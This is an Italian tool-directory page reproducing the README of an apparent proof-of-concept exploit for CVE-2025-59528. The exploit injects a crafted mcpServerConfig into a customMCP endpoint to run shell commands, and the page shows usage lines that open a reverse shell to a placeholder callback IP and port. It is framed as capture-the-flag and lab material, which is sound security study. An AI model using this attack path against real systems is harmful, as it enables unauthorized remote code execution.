Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59528-PoC — PoC per CVE-2025-59528 utilizzato per ottenere l'esecuzione remota di codice sulla macchina Silentium su HTB | Kitploit
Strumenti/GitHubGitHub/loaxert/cve-2025-59528-poc
ExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

PoC per CVE-2025-59528 utilizzato per ottenere l'esecuzione remota di codice sulla macchina Silentium su HTB

Vedi Repository
181 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-59528 PoC Didattico

Solo uso didattico. Questo progetto è destinato a ricerca sulla sicurezza controllata, dimostrazioni in aula e test autorizzati in un laboratorio isolato. Non utilizzarlo contro sistemi, reti, applicazioni o account che non possiedi o per cui non hai esplicito permesso di test.

Cosa dimostra questo PoC

Questa prova di concetto dimostra come un valore mcpServerConfig gestito in modo non corretto possa consentire l'esecuzione di JavaScript lato server e l'esecuzione di comandi tramite la funzionalità di caricamento dei nodi customMCP.

Lo script supporta due metodi di autenticazione:

  • Email/password: autentica tramite l'endpoint di login dell'applicazione e riutilizza i cookie di sessione restituiti.
  • Bearer token: invia una chiave API nell'intestazione Authorization.

Dopo l'autenticazione, lo script invia una configurazione appositamente predisposta a /api/v1/node-load-method/customMCP. Il payload utilizza le funzionalità dei processi figlio di Node.js per eseguire un comando shell e riconnettersi a un listener controllato dal ricercatore. Questo comportamento è incluso solo per dimostrare il potenziale impatto in un ambiente di laboratorio autorizzato.

Requisiti

  • Python 3.
  • Il pacchetto requests.

Installa la dipendenza con:

root@kitploit:~
python3 -m pip install requests

Utilizzo

Salva lo script come CVE-2025-59528.py.

Modalità email e password

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

Esempio con valori solo esemplificativi:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

Modalità Bearer token

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

Esempio con valori solo esemplificativi:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

Lo script prevede che queste route dell'applicazione siano disponibili:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

Lo script attuale costruisce URL http://. Aggiorna l'implementazione per HTTPS quando testi una distribuzione di laboratorio che richiede TLS.

Come funziona il codice

  1. main() convalida il numero di argomenti della riga di comando e seleziona la modalità di autenticazione.
  2. login() invia le credenziali fornite all'endpoint di login.
  3. tokens() estrae i valori di sessione dall'intestazione della risposta Set-Cookie.
  4. shell() costruisce la richiesta autenticata e invia il valore mcpServerConfig predisposto.
  5. bearer() esegue la stessa richiesta utilizzando un bearer token invece dei cookie di sessione.
  6. Il corpo della risposta viene stampato per consentire al ricercatore di correlare il risultato con i log dell'applicazione e del server.
Scarica lo strumento